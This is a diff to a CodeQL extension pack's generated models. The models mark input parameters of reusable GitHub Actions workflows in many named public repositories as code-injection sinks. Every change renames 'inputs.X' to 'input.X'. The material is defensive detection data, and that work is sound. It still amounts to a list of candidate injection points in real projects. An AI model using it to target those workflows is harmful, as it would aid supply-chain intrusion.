githubsecuritylab/actions-all extensible: sinkModel data: - - ["expensify/app/.github/workflows/e2ePerformanceTests.yml", "*", "inputs.PR_NUMBER", "code-injection", "generated"] \ No newline at end of file + - ["expensify/app/.github/workflows/e2ePerformanceTests.yml", "*", "input.PR_NUMBER", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml index 78243b4c6d73..860dcdcb43d4 100644 --- a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "inputs.image-tag", "code-injection", "generated"] - - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "inputs.tag-suffix", "code-injection", "generated"] \ No newline at end of file + - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "input.image-tag", "code-injection", "generated"] + - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "input.tag-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml index 6e69fb89fc87..539edcd58916 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["facebook/create-react-app/.github/workflows/e2e-base.yml", "*", "inputs.testScript", "code-injection", "generated"] \ No newline at end of file + - ["facebook/create-react-app/.github/workflows/e2e-base.yml", "*", "input.testScript", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml index fee19d65a097..b1b37d967e9a 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml 
@@ -3,13 +3,13 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "inputs.aws_s3_cp_extra_args", "code-injection", "generated"] - - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "inputs.s3_path", "code-injection", "generated"] - - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "inputs.filter", "code-injection", "generated"] - - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "inputs.artifact_tag", "code-injection", "generated"] - - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "inputs.filter", "code-injection", "generated"] - - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "inputs.artifact_tag", "code-injection", "generated"] - - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "inputs.pypirc", "code-injection", "generated"] - - ["facebookresearch/xformers/.github/workflows/wheels_build.yml", "*", "inputs.cuda_short_version", "code-injection", "generated"] - - ["facebookresearch/xformers/.github/workflows/wheels_build.yml", "*", "inputs.torch_version", "code-injection", "generated"] - - ["facebookresearch/xformers/.github/workflows/linters_reusable.yml", "*", "inputs.pre-script", "code-injection", "generated"] \ No newline at end of file + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.aws_s3_cp_extra_args", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.s3_path", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.filter", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.artifact_tag", "code-injection", "generated"] + - 
["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "input.filter", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "input.artifact_tag", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "input.pypirc", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_build.yml", "*", "input.cuda_short_version", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_build.yml", "*", "input.torch_version", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/linters_reusable.yml", "*", "input.pre-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml index 51b58ab74f58..51691edc1f97 100644 --- a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml 
@@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "inputs.build_type", "code-injection", "generated"] - - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "inputs.version", "code-injection", "generated"] - - ["falcosecurity/falco/.github/workflows/reusable_test_packages.yaml", "*", "inputs.version", "code-injection", "generated"] - - ["falcosecurity/falco/.github/workflows/reusable_test_packages.yaml", "*", "inputs.arch", "code-injection", "generated"] - - ["falcosecurity/falco/.github/workflows/reusable_publish_packages.yaml", "*", "inputs.version", "code-injection", "generated"] - - ["falcosecurity/falco/.github/workflows/reusable_publish_packages.yaml", "*", "inputs.bucket_suffix", "code-injection", "generated"] \ No newline at end of file + - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "input.build_type", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "input.version", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_test_packages.yaml", "*", "input.version", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_test_packages.yaml", "*", "input.arch", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_publish_packages.yaml", "*", "input.version", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_publish_packages.yaml", "*", "input.bucket_suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml index 5a53b788312c..3a14f6a879d5 100644 --- a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["fastify/fastify/.github/workflows/citgm-package.yml", "*", "inputs.package", "code-injection", "generated"] \ No newline at end of file + - ["fastify/fastify/.github/workflows/citgm-package.yml", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml index 579e295213bf..c7f84e83db5a 100644 --- a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ferretdb/ferretdb/.github/workflows/_integration.yml", "*", "inputs.task", "code-injection", "generated"] \ No newline at end of file + - ["ferretdb/ferretdb/.github/workflows/_integration.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml index bc8133b907c6..72383be71ca2 100644 --- a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "inputs.test_timeout", "code-injection", "generated"] - - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "inputs.log_level", "code-injection", "generated"] - - ["filecoin-project/venus/.github/workflows/common_build_upload.yml", "*", "inputs.bin_name", "code-injection", "generated"] - - ["filecoin-project/venus/.github/workflows/common_build_upload.yml", "*", "inputs.has_ffi", "code-injection", "generated"] \ No newline at end of file + - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "input.test_timeout", "code-injection", "generated"] + - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "input.log_level", "code-injection", "generated"] + - ["filecoin-project/venus/.github/workflows/common_build_upload.yml", "*", "input.bin_name", "code-injection", "generated"] + - ["filecoin-project/venus/.github/workflows/common_build_upload.yml", "*", "input.has_ffi", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml index 232c6abb3f33..8b05adf053ea 100644 --- a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml 
@@ -3,17 +3,17 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "inputs.triggered_by_callable", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "inputs.package_version_number", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "inputs.base_branch", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "inputs.cpp_release_version", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.platforms", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.runIntegrationTests", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.apis", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.working_branch", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.release_label", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.create_new_branch", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/build_windows.yml", "*", "inputs.apis", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/build_tvos.yml", "*", "inputs.apis", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/build_macos.yml", "*", "inputs.apis", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/build_linux.yml", "*", "inputs.apis", "code-injection", "generated"] \ No newline at end of file + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", 
"input.triggered_by_callable", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.package_version_number", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.base_branch", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.cpp_release_version", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "input.platforms", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "input.runIntegrationTests", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "input.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "input.working_branch", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "input.release_label", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "input.create_new_branch", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_windows.yml", "*", "input.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_tvos.yml", "*", "input.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_macos.yml", "*", "input.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_linux.yml", "*", "input.apis", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml index 8a7d3c60c452..9eec959ade3a 100644 --- a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["flarum/framework/.github/workflows/REUSABLE_backend.yml", "*", "inputs.monorepo_tests", "code-injection", "generated"] \ No newline at end of file + - ["flarum/framework/.github/workflows/REUSABLE_backend.yml", "*", "input.monorepo_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml index a1e523d92cec..835301ecc73a 100644 --- a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml 
@@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["fluent/fluent-bit/.github/workflows/call-windows-unit-tests.yaml", "*", "inputs.unstable", "code-injection", "generated"] - - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.the_path", "code-injection", "generated"] - - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.last_commit", "code-injection", "generated"] - - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.binary_name_stem", "code-injection", "generated"] - - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamrc.yml", "*", "inputs.ver_num", "code-injection", "generated"] - - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamrc.yml", "*", "inputs.runner", "code-injection", "generated"] - - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamr_vscode_ext.yml", "*", "inputs.ver_num", "code-injection", "generated"] - - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamr_sdk.yml", "*", "inputs.ver_num", "code-injection", "generated"] \ No newline at end of file + - ["fluent/fluent-bit/.github/workflows/call-windows-unit-tests.yaml", "*", "input.unstable", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.the_path", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.last_commit", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.binary_name_stem", "code-injection", 
"generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamrc.yml", "*", "input.ver_num", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamrc.yml", "*", "input.runner", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamr_vscode_ext.yml", "*", "input.ver_num", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamr_sdk.yml", "*", "input.ver_num", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml index 22729c980dea..9a99588239ee 100644 --- a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["flux-iac/tofu-controller/.github/workflows/targeted-test.yaml", "*", "inputs.pattern", "code-injection", "generated"] \ No newline at end of file + - ["flux-iac/tofu-controller/.github/workflows/targeted-test.yaml", "*", "input.pattern", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml index e242d38bdbe1..12c370b33ada 100644 --- a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["flyteorg/flyte/.github/workflows/publish.yml", "*", "inputs.before-build", "code-injection", "generated"] - - ["flyteorg/flyte/.github/workflows/integration.yml", "*", "inputs.component", "code-injection", "generated"] - - ["flyteorg/flyte/.github/workflows/component_docker_build.yml", "*", "inputs.component", "code-injection", "generated"] \ No newline at end of file + - ["flyteorg/flyte/.github/workflows/publish.yml", "*", "input.before-build", "code-injection", "generated"] + - ["flyteorg/flyte/.github/workflows/integration.yml", "*", "input.component", "code-injection", "generated"] + - ["flyteorg/flyte/.github/workflows/component_docker_build.yml", "*", "input.component", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml index f9c6658f5b8d..0e03216fc698 100644 --- a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "inputs.org", "code-injection", "generated"] - - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "inputs.solution", "code-injection", "generated"] - - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "inputs.compose-command", "code-injection", "generated"] \ No newline at end of file + - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.org", "code-injection", "generated"] + - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.solution", "code-injection", "generated"] + - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.compose-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml index 798c6bcc37a3..081378c96179 100644 --- a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["freecad/freecad/.github/workflows/sub_wrapup.yml", "*", "inputs.previousSteps", "code-injection", "generated"] \ No newline at end of file + - ["freecad/freecad/.github/workflows/sub_wrapup.yml", "*", "input.previousSteps", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml index 687db46824ac..fcd9c2929013 100644 --- a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "inputs.output-path", "code-injection", "generated"] - - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "inputs.settings", "code-injection", "generated"] - - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "inputs.requirements", "code-injection", "generated"] \ No newline at end of file + - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.output-path", "code-injection", "generated"] + - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.settings", "code-injection", "generated"] + - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.requirements", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml index 8a13569af7c9..19822c29fcda 100644 --- a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["getporter/porter/.github/workflows/build_pipelinesrelease_template.yml", "*", "inputs.registry", "code-injection", "generated"] \ No newline at end of file + - ["getporter/porter/.github/workflows/build_pipelinesrelease_template.yml", "*", "input.registry", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml index 453eb862b94a..d0ccde698b1a 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "inputs.panaThreshold", "code-injection", "generated"] - - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "inputs.sdk", "code-injection", "generated"] \ No newline at end of file + - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "input.panaThreshold", "code-injection", "generated"] + - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "input.sdk", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml index 37074688f173..027da83e922d 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["getsentry/sentry-unity/.github/workflows/sdk.yml", "*", "inputs.target", "code-injection", "generated"] - - ["getsentry/sentry-unity/.github/workflows/android-smoke-test.yml", "*", "inputs.api-level", "code-injection", "generated"] \ No newline at end of file + - ["getsentry/sentry-unity/.github/workflows/sdk.yml", "*", "input.target", "code-injection", "generated"] + - ["getsentry/sentry-unity/.github/workflows/android-smoke-test.yml", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml index 2e1835cadcad..a914aa631c3d 100644 --- a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["gitpod-io/gitpod/.github/workflows/jetbrains-auto-update-template.yml", "*", "inputs.productId", "code-injection", "generated"] \ No newline at end of file + - ["gitpod-io/gitpod/.github/workflows/jetbrains-auto-update-template.yml", "*", "input.productId", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml index 924f5eb157c9..d0fe6b0eff5a 100644 --- a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["gittools/gitversion/.github/workflows/_artifacts_linux.yml", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file + - ["gittools/gitversion/.github/workflows/_artifacts_linux.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml index 1244f76cbf1f..3d3a4de2946a 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["googlecloudplatform/magic-modules/.github/workflows/build-downstream.yml", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file + - ["googlecloudplatform/magic-modules/.github/workflows/build-downstream.yml", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml index 94c6c81d33ec..4c58af6969dc 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "inputs.path", "code-injection", "generated"] - - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "input.path", "code-injection", "generated"] + - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml index c5f5fc4b29d7..8629f279891a 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["gravitational/teleport/.github/workflows/update-ami-ids.yaml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["gravitational/teleport/.github/workflows/update-ami-ids.yaml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml index 506dd2b9fee2..4a6bbd77ec97 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["gravitl/netmaker/.github/workflows/publish-docker.yml", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file + - ["gravitl/netmaker/.github/workflows/publish-docker.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml index 4a81c585259a..c22998ee52a4 100644 --- a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "inputs.build-version", "code-injection", "generated"] - - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "inputs.wave-app-name", "code-injection", "generated"] - - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "inputs.working-directory", "code-injection", "generated"] \ No newline at end of file + - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.build-version", "code-injection", "generated"] + - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.wave-app-name", "code-injection", "generated"] + - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.working-directory", "code-injection", "generated"] \ No newline at end of file 
